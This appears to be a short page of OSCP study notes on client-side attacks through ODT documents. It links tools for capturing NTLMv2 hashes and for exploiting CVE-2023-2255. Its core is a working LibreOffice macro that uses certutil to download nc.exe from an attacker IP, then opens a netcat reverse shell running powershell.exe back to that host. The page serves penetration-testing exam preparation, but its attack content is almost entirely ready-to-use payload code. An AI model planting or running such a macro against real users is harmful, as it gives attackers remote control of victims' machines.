🧪

Client Side Attacks Odt Files

Catch NTLMv2 hashes with badodt

#cool#adot8
source · oscp.adot8.com · cool/client-side-attacks_odt-files

ODT Files

Catch NTLMv2 hashes with badodt

{% embed url="https://github.com/rmdavy/badodf/tree/master" %}

Catch a reverse shell instead

{% embed url="https://medium.com/@akshay__0/initial-access-via-malicious-odt-macro-ac7f5d15796d" %}

code
01Sub Main
02 shell("cmd /c certutil.exe -urlcache -f http://192.168.45.239/nc.exe C:\programdata\nc.exe")
03 shell("C:\programdata\nc.exe 192.168.45.239 1337 -e powershell.exe")
04End Sub

{% embed url="https://github.com/elweth-sec/CVE-2023-2255?tab=readme-ov-file" %}